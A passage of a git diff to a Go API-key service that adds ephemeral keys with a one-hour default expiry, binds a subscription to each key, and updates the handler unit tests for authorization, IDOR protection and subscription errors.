+		// Default 1hr expiration for ephemeral keys
+		d := 1 * time.Hour
+		expiresIn = &d
 	}
 
 	// Create key for the authenticated user with their groups
-	result, err := h.service.CreateAPIKey(c.Request.Context(), user.Username, user.Groups, req.Name, req.Description, expiresIn)
+	result, err := h.service.CreateAPIKey(c.Request.Context(), user.Username, user.Groups, name, req.Description, expiresIn, req.Ephemeral, strings.TrimSpace(req.Subscription))
 	if err != nil {
 		h.logger.Error("Failed to create API key", "error", err)
-		c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
+		if errors.Is(err, ErrExpirationNotPositive) || errors.Is(err, ErrExpirationExceedsMax) {
+			c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
+			return
+		}
+		var notFound *subscription.SubscriptionNotFoundError
+		var accessDenied *subscription.AccessDeniedError
+		var noSub *subscription.NoSubscriptionError
+		if errors.As(err, &notFound) || errors.As(err, &accessDenied) || errors.As(err, &noSub) {
+			c.JSON(http.StatusBadRequest, gin.H{
+				"error": apiKeySubscriptionResolutionErrMsg,
+				"code":  apiKeySubscriptionResolutionErrCode,
+			})
+			return
+		}
+		c.JSON(http.StatusInternalServerError, gin.H{"error": "Failed to create API key"})
 		return
 	}
 
@@ -286,6 +210,7 @@ func (h *Handler) CreateAPIKey(c *gin.Context) {
 		"keyPrefix", result.KeyPrefix,
 		"username", user.Username,
 		"groups", user.Groups,
+		"ephemeral", req.Ephemeral,
 	)
 
 	// Return the key - THIS IS THE ONLY TIME THE PLAINTEXT IS SHOWN
@@ -353,7 +278,7 @@ func (h *Handler) RevokeAPIKey(c *gin.Context) {
 	}
 
 	// Check authorization - user must own the key or be admin
-	if !h.isAuthorizedForKey(user, keyMetadata.Username) {
+	if !h.isAuthorizedForKey(c.Request.Context(), user, keyMetadata.Username) {
 		h.logger.Warn("Unauthorized API key revocation attempt",
 			"requestingUser", user.Username,
 			"keyOwner", keyMetadata.Username,
@@ -431,7 +356,7 @@ func (h *Handler) SearchAPIKeys(c *gin.Context) {
 	}
 
 	// Determine target username for filtering
-	isAdmin := h.isAdmin(user)
+	isAdmin := h.isAdmin(c.Request.Context(), user)
 	targetUsername := req.Filters.Username
 
 	if !isAdmin {
@@ -527,7 +452,7 @@ func (h *Handler) BulkRevokeAPIKeys(c *gin.Context) {
 	}
 
 	// Authorization: users can revoke own keys, admins can revoke any user's keys
-	if req.Username != user.Username && !h.isAdmin(user) {
+	if req.Username != user.Username && !h.isAdmin(c.Request.Context(), user) {
 		h.logger.Warn("Unauthorized bulk revoke attempt",
 			"requestingUser", user.Username,
 			"targetUser", req.Username,
diff --git a/maas-api/internal/api_keys/handler_test.go b/maas-api/internal/api_keys/handler_test.go
index 0abadaebb..be62ccf03 100644
--- a/maas-api/internal/api_keys/handler_test.go
+++ b/maas-api/internal/api_keys/handler_test.go
@@ -17,15 +17,53 @@ import (
 
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/config"
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger"
+	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/subscription"
 	"github.com/opendatahub-io/models-as-a-service/maas-api/internal/token"
 )
 
+const testSubscriptionName = "test-subscription"
+
+// fixedSubSelector satisfies SubscriptionSelector for handler tests (no cluster subscriptions).
+type fixedSubSelector struct{}
+
+func (fixedSubSelector) Select(_ []string, _ string, requested string, _ string) (*subscription.SelectResponse, error) {
+	if requested != "" {
+		return &subscription.SelectResponse{Name: requested}, nil
+	}
+	return &subscription.SelectResponse{Name: testSubscriptionName}, nil
+}
+
+func (fixedSubSelector) SelectHighestPriority(_ []string, _ string) (*subscription.SelectResponse, error) {
+	return &subscription.SelectResponse{Name: testSubscriptionName}, nil
+}
+
+// errSubSelector returns fixed errors from Select / SelectHighestPriority (for handler HTTP mapping tests).
+type errSubSelector struct {
+	selectErr          error
+	highestPriorityErr error
+}
+
+func (e errSubSelector) Select(_ []string, _ string, _ string, _ string) (*subscription.SelectResponse, error) {
+	if e.selectErr != nil {
+		return nil, e.selectErr
+	}
+	return &subscription.SelectResponse{Name: "stub-sub"}, nil
+}
+
+func (e errSubSelector) SelectHighestPriority(_ []string, _ string) (*subscription.SelectResponse, error) {
+	if e.highestPriorityErr != nil {
+		return nil, e.highestPriorityErr
+	}
+	return &subscription.SelectResponse{Name: testSubscriptionName}, nil
+}
+
 // Test constants.
 const (
 	testBulkRevokeAliceJSON = `{"username": "alice"}`
 )
 
 // mockAdminChecker is a simple mock for testing that checks if user has "admin-users" group.
+// This simulates the SAR check by checking group membership (for test simplicity).
 type mockAdminChecker struct {
 	adminGroups []string
 }
@@ -36,8 +74,11 @@ func newMockAdminChecker() *mockAdminChecker {
 	}
 }
 
-func (m *mockAdminChecker) IsAdmin(userGroups []string) bool {
-	for _, userGroup := range userGroups {
+func (m *mockAdminChecker) IsAdmin(_ context.Context, user *token.UserContext) bool {
+	if user == nil {
+		return false
+	}
+	for _, userGroup := range user.Groups {
 		if slices.Contains(m.adminGroups, userGroup) {
 			return true
 		}
@@ -68,20 +109,21 @@ func TestIsAuthorizedForKey(t *testing.T) {
 	h := &Handler{
 		adminChecker: newMockAdminChecker(),
 	}
+	ctx := context.Background()
 
 	t.Run("OwnerCanAccess", func(t *testing.T) {
 		user := &token.UserContext{Username: "alice", Groups: []string{"users"}}
-		assert.True(t, h.isAuthorizedForKey(user, "alice"))
+		assert.True(t, h.isAuthorizedForKey(ctx, user, "alice"))
 	})
 
 	t.Run("NonOwnerCannotAccess", func(t *testing.T) {
 		user := &token.UserContext{Username: "bob", Groups: []string{"users"}}
-		assert.False(t, h.isAuthorizedForKey(user, "alice"))
+		assert.False(t, h.isAuthorizedForKey(ctx, user, "alice"))
 	})
 
 	t.Run("AdminCanAccessAnyKey", func(t *testing.T) {
 		admin := &token.UserContext{Username: "admin", Groups: []string{"admin-users"}}
-		assert.True(t, h.isAuthorizedForKey(admin, "alice"))
+		assert.True(t, h.isAuthorizedForKey(ctx, admin, "alice"))
 	})
 }
 
@@ -93,7 +135,7 @@ func TestSearchAPIKeys_EmptyRequest(t *testing.T) {
 	gin.SetMode(gin.TestMode)
 	store := NewMockStore()
 	cfg := &config.Config{}
-	service := NewServiceWithLogger(store, cfg, logger.Development())
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 	testUser := &token.UserContext{
@@ -103,12 +145,12 @@ func TestSearchAPIKeys_EmptyRequest(t *testing.T) {
 
 	// Create test keys
 	ctx := context.Background()
-	err := store.AddKey(ctx, testUser.Username, "key-1", "hash-1", "Key 1", "", []string{"system:authenticated"}, nil)
+	err := store.AddKey(ctx, testUser.Username, "key-1", "hash-1", "Key 1", "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 	require.NoError(t, err)
-	err = store.AddKey(ctx, testUser.Username, "key-2", "hash-2", "Key 2", "", []string{"system:authenticated"}, nil)
+	err = store.AddKey(ctx, testUser.Username, "key-2", "hash-2", "Key 2", "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 	require.NoError(t, err)
 	// Create a revoked key
-	err = store.AddKey(ctx, testUser.Username, "key-3", "hash-3", "Key 3", "", []string{"system:authenticated"}, nil)
+	err = store.AddKey(ctx, testUser.Username, "key-3", "hash-3", "Key 3", "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 	require.NoError(t, err)
 	err = store.Revoke(ctx, "key-3")
 	require.NoError(t, err)
@@ -139,7 +181,7 @@ func TestSearchAPIKeys_Pagination(t *testing.T) {
 	gin.SetMode(gin.TestMode)
 	store := NewMockStore()
 	cfg := &config.Config{}
-	service := NewServiceWithLogger(store, cfg, logger.Development())
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 	testUser := &token.UserContext{
@@ -153,7 +195,7 @@ func TestSearchAPIKeys_Pagination(t *testing.T) {
 		keyID := fmt.Sprintf("key-%d", i)
 		keyHash := fmt.Sprintf("hash-%d", i)
 		name := fmt.Sprintf("Key %d", i)
-		err := store.AddKey(ctx, testUser.Username, keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
+		err := store.AddKey(ctx, testUser.Username, keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 		require.NoError(t, err)
 	}
 
@@ -243,7 +285,7 @@ func TestSearchAPIKeys_StatusFilter(t *testing.T) {
 	gin.SetMode(gin.TestMode)
 	store := NewMockStore()
 	cfg := &config.Config{}
-	service := NewServiceWithLogger(store, cfg, logger.Development())
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 	ctx := context.Background()
@@ -253,9 +295,9 @@ func TestSearchAPIKeys_StatusFilter(t *testing.T) {
 	}
 
 	// Create active and revoked keys
-	err := store.AddKey(ctx, testUser.Username, "active-key", "active-hash", "Active Key", "", []string{"system:authenticated"}, nil)
+	err := store.AddKey(ctx, testUser.Username, "active-key", "active-hash", "Active Key", "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 	require.NoError(t, err)
-	err = store.AddKey(ctx, testUser.Username, "revoked-key", "revoked-hash", "Revoked Key", "", []string{"system:authenticated"}, nil)
+	err = store.AddKey(ctx, testUser.Username, "revoked-key", "revoked-hash", "Revoked Key", "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 	require.NoError(t, err)
 	err = store.Revoke(ctx, "revoked-key")
 	require.NoError(t, err)
@@ -369,7 +411,7 @@ func TestSearchAPIKeys_Sorting(t *testing.T) {
 	gin.SetMode(gin.TestMode)
 	store := NewMockStore()
 	cfg := &config.Config{}
-	service := NewServiceWithLogger(store, cfg, logger.Development())
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 	ctx := context.Background()
@@ -379,11 +421,11 @@ func TestSearchAPIKeys_Sorting(t *testing.T) {
 	}
 
 	// Create keys with different names
-	err := store.AddKey(ctx, testUser.Username, "key-1", "hash-1", "Charlie", "", []string{"system:authenticated"}, nil)
+	err := store.AddKey(ctx, testUser.Username, "key-1", "hash-1", "Charlie", "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 	require.NoError(t, err)
-	err = store.AddKey(ctx, testUser.Username, "key-2", "hash-2", "Alice", "", []string{"system:authenticated"}, nil)
+	err = store.AddKey(ctx, testUser.Username, "key-2", "hash-2", "Alice", "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 	require.NoError(t, err)
-	err = store.AddKey(ctx, testUser.Username, "key-3", "hash-3", "Bob", "", []string{"system:authenticated"}, nil)
+	err = store.AddKey(ctx, testUser.Username, "key-3", "hash-3", "Bob", "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 	require.NoError(t, err)
 
 	t.Run("DefaultSort_CreatedAtDesc", func(t *testing.T) {
@@ -494,7 +536,7 @@ func TestSearchAPIKeys_AdminVsRegularUser(t *testing.T) {
 	gin.SetMode(gin.TestMode)
 	store := NewMockStore()
 	cfg := &config.Config{}
-	service := NewServiceWithLogger(store, cfg, logger.Development())
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 	ctx := context.Background()
@@ -506,7 +548,7 @@ func TestSearchAPIKeys_AdminVsRegularUser(t *testing.T) {
 			keyID := fmt.Sprintf("%s-key-%d", username, i)
 			keyHash := fmt.Sprintf("%s-hash-%d", username, i)
 			name := fmt.Sprintf("%s Key %d", username, i)
-			err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
+			err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 			require.NoError(t, err)
 		}
 	}
@@ -614,7 +656,7 @@ func TestSearchAPIKeys_AdminFiltersByUsernameAndStatus(t *testing.T) {
 	gin.SetMode(gin.TestMode)
 	store := NewMockStore()
 	cfg := &config.Config{}
-	service := NewServiceWithLogger(store, cfg, logger.Development())
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 	ctx := context.Background()
@@ -627,14 +669,14 @@ func TestSearchAPIKeys_AdminFiltersByUsernameAndStatus(t *testing.T) {
 			keyID := fmt.Sprintf("%s-active-%d", username, i)
 			keyHash := fmt.Sprintf("%s-hash-active-%d", username, i)
 			name := fmt.Sprintf("%s Active Key %d", username, i)
-			err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
+			err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 			require.NoError(t, err)
 		}
 		// Create 1 revoked key
 		keyID := fmt.Sprintf("%s-revoked", username)
 		keyHash := fmt.Sprintf("%s-hash-revoked", username)
 		name := fmt.Sprintf("%s Revoked Key", username)
-		err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
+		err := store.AddKey(ctx, username, keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 		require.NoError(t, err)
 		err = store.Revoke(ctx, keyID)
 		require.NoError(t, err)
@@ -697,7 +739,7 @@ func TestBulkRevokeAPIKeys(t *testing.T) {
 	gin.SetMode(gin.TestMode)
 	store := NewMockStore()
 	cfg := &config.Config{}
-	service := NewServiceWithLogger(store, cfg, logger.Development())
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 	ctx := context.Background()
@@ -707,7 +749,7 @@ func TestBulkRevokeAPIKeys(t *testing.T) {
 		keyID := fmt.Sprintf("alice-key-%d", i)
 		keyHash := fmt.Sprintf("alice-hash-%d", i)
 		name := fmt.Sprintf("Alice Key %d", i)
-		err := store.AddKey(ctx, "alice", keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
+		err := store.AddKey(ctx, "alice", keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 		require.NoError(t, err)
 	}
 
@@ -715,7 +757,7 @@ func TestBulkRevokeAPIKeys(t *testing.T) {
 		keyID := fmt.Sprintf("bob-key-%d", i)
 		keyHash := fmt.Sprintf("bob-hash-%d", i)
 		name := fmt.Sprintf("Bob Key %d", i)
-		err := store.AddKey(ctx, "bob", keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
+		err := store.AddKey(ctx, "bob", keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 		require.NoError(t, err)
 	}
 
@@ -770,7 +812,7 @@ func TestBulkRevokeAPIKeys(t *testing.T) {
 			keyID := fmt.Sprintf("alice-key-%d", i)
 			keyHash := fmt.Sprintf("alice-hash-%d", i)
 			name := fmt.Sprintf("Alice Key %d", i)
-			err := store.AddKey(ctx, "alice", keyID, keyHash, name, "", []string{"system:authenticated"}, nil)
+			err := store.AddKey(ctx, "alice", keyID, keyHash, name, "", []string{"system:authenticated"}, testSubscriptionName, nil, false)
 			require.NoError(t, err)
 		}
 
@@ -851,7 +893,7 @@ func TestUserCanCreateOwnKey(t *testing.T) {
 	gin.SetMode(gin.TestMode)
 	store := NewMockStore()
 	cfg := &config.Config{}
-	service := NewServiceWithLogger(store, cfg, logger.Development())
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 	regularUser := &token.UserContext{
@@ -875,11 +917,104 @@ func TestUserCanCreateOwnKey(t *testing.T) {
 	err := json.Unmarshal(w.Body.Bytes(), &response)
 	require.NoError(t, err)
 
+	assert.Equal(t, testSubscriptionName, response.Subscription)
+
 	// Verify key is owned by alice with her actual groups
 	meta, err := store.Get(context.Background(), response.ID)
 	require.NoError(t, err)
 	assert.Equal(t, "alice", meta.Username)
 	assert.Equal(t, []string{"tier-free", "system:authenticated"}, meta.Groups)
+	assert.Equal(t, testSubscriptionName, meta.Subscription)
+}
+
+func TestCreateAPIKey_WithExplicitSubscription(t *testing.T) {
+	gin.SetMode(gin.TestMode)
+	store := NewMockStore()
+	cfg := &config.Config{}
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
+	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
+
+	user := &token.UserContext{Username: "alice", Groups: []string{"system:authenticated"}}
+	body := `{"name": "k1", "subscription": "custom-sub"}`
+
+	w := httptest.NewRecorder()
+	c, _ := gin.CreateTestContext(w)
+	c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil)
+	c.Request.Header.Set("Content-Type", "application/json")
+	c.Request.Body = io.NopCloser(strings.NewReader(body))
+	c.Set("user", user)
+
+	handler.CreateAPIKey(c)
+	require.Equal(t, http.StatusCreated, w.Code)
+
+	var response CreateAPIKeyResponse
+	require.NoError(t, json.Unmarshal(w.Body.Bytes(), &response))
+	assert.Equal(t, "custom-sub", response.Subscription)
+
+	meta, err := store.Get(context.Background(), response.ID)
+	require.NoError(t, err)
+	assert.Equal(t, "custom-sub", meta.Subscription)
+}
+
+func TestCreateAPIKey_SubscriptionSelectErrors(t *testing.T) {
+	gin.SetMode(gin.TestMode)
+	user := &token.UserContext{Username: "alice", Groups: []string{"system:authenticated"}}
+
+	tests := []struct {
+		name string
+		sel  errSubSelector
+		body string
+	}{
+		{
+			name: "explicit subscription not found",
+			sel: errSubSelector{
+				selectErr: &subscription.SubscriptionNotFoundError{Subscription: "missing-sub"},
+			},
+			body: `{"name": "k1", "subscription": "missing-sub"}`,
+		},
+		{
+			name: "explicit subscription access denied",
+			sel: errSubSelector{
+				selectErr: &subscription.AccessDeniedError{Subscription: "other-sub"},
+			},
+			body: `{"name": "k1", "subscription": "other-sub"}`,
+		},
+		{
+			name: "no accessible subscription when omitting field",
+			sel: errSubSelector{
+				highestPriorityErr: &subscription.NoSubscriptionError{},
+			},
+			body: `{"name": "k1"}`,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			store := NewMockStore()
+			cfg := &config.Config{}
+			service := NewServiceWithLogger(store, cfg, tt.sel, logger.Development())
+			h := NewHandler(logger.Development(), service, newMockAdminChecker())
+
+			w := httptest.NewRecorder()
+			c, _ := gin.CreateTestContext(w)
+			c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil)
+			c.Request.Header.Set("Content-Type", "application/json")
+			c.Request.Body = io.NopCloser(strings.NewReader(tt.body))
+			c.Set("user", user)
+
+			h.CreateAPIKey(c)
+
+			assert.Equal(t, http.StatusBadRequest, w.Code)
+			var resp map[string]string
+			require.NoError(t, json.Unmarshal(w.Body.Bytes(), &resp))
+			assert.Equal(t, apiKeySubscriptionResolutionErrCode, resp["code"])
+			assert.Equal(t, apiKeySubscriptionResolutionErrMsg, resp["error"])
+
+			res, err := store.Search(context.Background(), user.Username, &SearchFilters{}, &SortParams{By: DefaultSortBy, Order: DefaultSortOrder}, &PaginationParams{Limit: 10, Offset: 0})
+			require.NoError(t, err)
+			assert.Empty(t, res.Keys, "no key should be persisted on subscription resolution failure")
+		})
+	}
 }
 
 // ============================================================
@@ -890,7 +1025,7 @@ func TestGetAPIKeyHandler(t *testing.T) {
 	gin.SetMode(gin.TestMode)
 	store := NewMockStore()
 	cfg := &config.Config{}
-	service := NewServiceWithLogger(store, cfg, logger.Development())
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 	// Create test keys for alice and bob
@@ -912,22 +1047,19 @@ func TestGetAPIKeyHandler(t *testing.T) {
 	}
 
 	// Add keys to store
-	err := store.AddKey(context.Background(), aliceKey.Username, aliceKey.ID, "hash1", aliceKey.Name, "", aliceKey.Groups, nil)
+	err := store.AddKey(context.Background(), aliceKey.Username, aliceKey.ID, "hash1", aliceKey.Name, "", aliceKey.Groups, testSubscriptionName, nil, false)
 	require.NoError(t, err)
-	err = store.AddKey(context.Background(), bobKey.Username, bobKey.ID, "hash2", bobKey.Name, "", bobKey.Groups, nil)
+	err = store.AddKey(context.Background(), bobKey.Username, bobKey.ID, "hash2", bobKey.Name, "", bobKey.Groups, testSubscriptionName, nil, false)
 	require.NoError(t, err)
 
-	t.Run("OwnerCanGetOwnKey", func(t *testing.T) {
-		aliceUser := &token.UserContext{
-			Username: "alice",
-			Groups:   []string{"tier-free"},
-		}
-
+	// Helper function to test successful key retrieval
+	testSuccessfulGetKey := func(t *testing.T, user *token.UserContext, keyID string) {
+		t.Helper()
 		w := httptest.NewRecorder()
 		c, _ := gin.CreateTestContext(w)
-		c.Request = httptest.NewRequest(http.MethodGet, "/v1/api-keys/alice-key-1", nil)
-		c.Set("user", aliceUser)
-		c.Params = gin.Params{{Key: "id", Value: "alice-key-1"}}
+		c.Request = httptest.NewRequest(http.MethodGet, "/v1/api-keys/"+keyID, nil)
+		c.Set("user", user)
+		c.Params = gin.Params{{Key: "id", Value: keyID}}
 
 		handler.GetAPIKey(c)
 
@@ -935,8 +1067,17 @@ func TestGetAPIKeyHandler(t *testing.T) {
 		var response ApiKey
 		err := json.Unmarshal(w.Body.Bytes(), &response)
 		require.NoError(t, err)
-		assert.Equal(t, "alice-key-1", response.ID)
+		assert.Equal(t, keyID, response.ID)
 		assert.Equal(t, "alice", response.Username)
+		assert.Equal(t, testSubscriptionName, response.Subscription)
+	}
+
+	t.Run("OwnerCanGetOwnKey", func(t *testing.T) {
+		aliceUser := &token.UserContext{
+			Username: "alice",
+			Groups:   []string{"tier-free"},
+		}
+		testSuccessfulGetKey(t, aliceUser, "alice-key-1")
 	})
 
 	t.Run("RegularUserCannotGetOthersKey_IDOR_Protection", func(t *testing.T) {
@@ -967,21 +1108,7 @@ func TestGetAPIKeyHandler(t *testing.T) {
 			Username: "admin",
 			Groups:   []string{"admin-users"},
 		}
-
-		w := httptest.NewRecorder()
-		c, _ := gin.CreateTestContext(w)
-		c.Request = httptest.NewRequest(http.MethodGet, "/v1/api-keys/alice-key-1", nil)
-		c.Set("user", adminUser)
-		c.Params = gin.Params{{Key: "id", Value: "alice-key-1"}}
-
-		handler.GetAPIKey(c)
-
-		assert.Equal(t, http.StatusOK, w.Code)
-		var response ApiKey
-		err := json.Unmarshal(w.Body.Bytes(), &response)
-		require.NoError(t, err)
-		assert.Equal(t, "alice-key-1", response.ID)
-		assert.Equal(t, "alice", response.Username)
+		testSuccessfulGetKey(t, adminUser, "alice-key-1")
 	})
 
 	t.Run("NonExistentKeyReturns404", func(t *testing.T) {
@@ -1011,11 +1138,11 @@ func testRevokeKeySuccess(t *testing.T, user *token.UserContext) {
 	t.Helper()
 	store := NewMockStore()
 	cfg := &config.Config{}
-	service := NewServiceWithLogger(store, cfg, logger.Development())
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 	// Create alice's key
-	err := store.AddKey(context.Background(), "alice", "alice-key-1", "hash1", "Alice's Key", "", []string{"tier-free"}, nil)
+	err := store.AddKey(context.Background(), "alice", "alice-key-1", "hash1", "Alice's Key", "", []string{"tier-free"}, testSubscriptionName, nil, false)
 	require.NoError(t, err)
 
 	w := httptest.NewRecorder()
@@ -1054,11 +1181,11 @@ func TestRevokeAPIKeyHandler(t *testing.T) {
 	t.Run("RegularUserCannotRevokeOthersKey_IDOR_Protection", func(t *testing.T) {
 		store := NewMockStore()
 		cfg := &config.Config{}
-		service := NewServiceWithLogger(store, cfg, logger.Development())
+		service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 		handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 		// Create alice's key
-		err := store.AddKey(context.Background(), "alice", "alice-key-1", "hash1", "Alice's Key", "", []string{"tier-free"}, nil)
+		err := store.AddKey(context.Background(), "alice", "alice-key-1", "hash1", "Alice's Key", "", []string{"tier-free"}, testSubscriptionName, nil, false)
 		require.NoError(t, err)
 
 		// Bob trying to revoke Alice's key
@@ -1099,7 +1226,7 @@ func TestRevokeAPIKeyHandler(t *testing.T) {
 	t.Run("NonExistentKeyReturns404", func(t *testing.T) {
 		store := NewMockStore()
 		cfg := &config.Config{}
-		service := NewServiceWithLogger(store, cfg, logger.Development())
+		service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 		handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 		aliceUser := &token.UserContext{
@@ -1121,11 +1248,11 @@ func TestRevokeAPIKeyHandler(t *testing.T) {
 	t.Run("CannotRevokeAlreadyRevokedKey", func(t *testing.T) {
 		store := NewMockStore()
 		cfg := &config.Config{}
-		service := NewServiceWithLogger(store, cfg, logger.Development())
+		service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
 		handler := NewHandler(logger.Development(), service, newMockAdminChecker())
 
 		// Create and immediately revoke alice's key
-		err := store.AddKey(context.Background(), "alice", "alice-key-1", "hash1", "Alice's Key", "", []string{"tier-free"}, nil)
+		err := store.AddKey(context.Background(), "alice", "alice-key-1", "hash1", "Alice's Key", "", []string{"tier-free"}, testSubscriptionName, nil, false)
 		require.NoError(t, err)
 		err = store.Revoke(context.Background(), "alice-key-1")
 		require.NoError(t, err)
@@ -1147,3 +1274,188 @@ func TestRevokeAPIKeyHandler(t *testing.T) {
 		assert.Equal(t, http.StatusNotFound, w.Code)
 	})
 }
+
+// ============================================================
+// EPHEMERAL API KEY TESTS
+// ============================================================
+
+func TestCreateEphemeralAPIKey(t *testing.T) {
+	gin.SetMode(gin.TestMode)
+	store := NewMockStore()
+	cfg := &config.Config{}
+	service := NewServiceWithLogger(store, cfg, fixedSubSelector{}, logger.Development())
+	handler := NewHandler(logger.Development(), service, newMockAdminChecker())
+
+	testUser := &token.UserContext{
+		Username: "playground-user",
+		Groups:   []string{"system:authenticated"},
+	}
+
+	t.Run("EphemeralKeyBindsSubscriptionAtMint", func(t *testing.T) {
+		requestBody := `{"ephemeral": true}`
+
+		w := httptest.NewRecorder()
+		c, _ := gin.CreateTestContext(w)
+		c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil)
+		c.Request.Header.Set("Content-Type", "application/json")
+		c.Request.Body = io.NopCloser(strings.NewReader(requestBody))
+		c.Set("user", testUser)
+
+		handler.CreateAPIKey(c)
+
+		require.Equal(t, http.StatusCreated, w.Code)
+		var response CreateAPIKeyResponse
+		require.NoError(t, json.Unmarshal(w.Body.Bytes(), &response))
+
+		assert.Equal(t, testSubscriptionName, response.Subscription,
+			"ephemeral mint response should include bound subscription")
+
+		meta, err := store.Get(context.Background(), response.ID)
+		require.NoError(t, err)
+		assert.Equal(t, testSubscriptionName, meta.Subscription,
+			"stored key metadata should include subscription")
+
+		valResult, err := service.ValidateAPIKey(context.Background(), response.Key)
+		require.NoError(t, err)
+		require.True(t, valResult.Valid, "ephemeral key should validate")
+		assert.Equal(t, testSubscriptionName, valResult.Subscription,
+			"validation result should echo subscription for Authorino")
+	})
+
+	t.Run("EphemeralKeyWithoutName", func(t *testing.T) {
+		requestBody := `{"ephemeral": true}`
+
+		w := httptest.NewRecorder()
+		c, _ := gin.CreateTestContext(w)
+		c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil)
+		c.Request.Header.Set("Content-Type", "application/json")
+		c.Request.Body = io.NopCloser(strings.NewReader(requestBody))
+		c.Set("user", testUser)
+
+		handler.CreateAPIKey(c)
+
+		assert.Equal(t, http.StatusCreated, w.Code)
+		var response CreateAPIKeyResponse
+		err := json.Unmarshal(w.Body.Bytes(), &response)
+		require.NoError(t, err)
+
+		// Name should be auto-generated
+		assert.Contains(t, response.Name, "ephemeral-")
+		// Expiration should be set (1hr default)
+		assert.NotNil(t, response.ExpiresAt)
+		// Ephemeral flag should be true in response
+		assert.True(t, response.Ephemeral, "ephemeral should be true in response")
+	})
+
+	t.Run("EphemeralKeyWithName", func(t *testing.T) {
+		requestBody := `{"ephemeral": true, "name": "my-playground-key"}`
+
+		w := httptest.NewRecorder()
+		c, _ := gin.CreateTestContext(w)
+		c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil)
+		c.Request.Header.Set("Content-Type", "application/json")
+		c.Request.Body = io.NopCloser(strings.NewReader(requestBody))
+		c.Set("user", testUser)
+
+		handler.CreateAPIKey(c)
+
+		assert.Equal(t, http.StatusCreated, w.Code)
+		var response CreateAPIKeyResponse
+		err := json.Unmarshal(w.Body.Bytes(), &response)
+		require.NoError(t, err)
+
+		assert.Equal(t, "my-playground-key", response.Name)
+		// Ephemeral flag should be true in response
+		assert.True(t, response.Ephemeral, "ephemeral should be true in response")
+	})
+
+	t.Run("NonEphemeralRequiresName", func(t *testing.T) {
+		requestBody := `{}`
+
+		w := httptest.NewRecorder()
+		c, _ := gin.CreateTestContext(w)
+		c.Request = httptest.NewRequest(http.MethodPost, "/v1/api-keys", nil)
+		c.Request.Header.Set("Content-Type", "application/json")
+		c.Request.Body = io.NopCloser(strings.NewReader(requestBody))
+		c.Set("user", testUser)
+
+		handler.CreateAPIKey(c)
+
+		assert.Equal(t, http.StatusBadRequest, w.Code)
+		var response map[string]string
+		err := json.Unmarshal(w.Body.Bytes(), &response)
+		require.NoError(t, err)
+		assert.Contains(t, response["error"], "name is required")
+	})
+
+	t.Run("EphemeralKeyExceedsMaxExpiration", func(t *testing.T) {
+		// Try to create ephemeral key with 2hr expiration (exceeds 1hr max)
+		requestBody := `{"ephemeral": true, "expiresIn": "2h"}`
+
+		w := httptest.NewRecorder()
+		c, _ := gin.CreateTestContext(w)
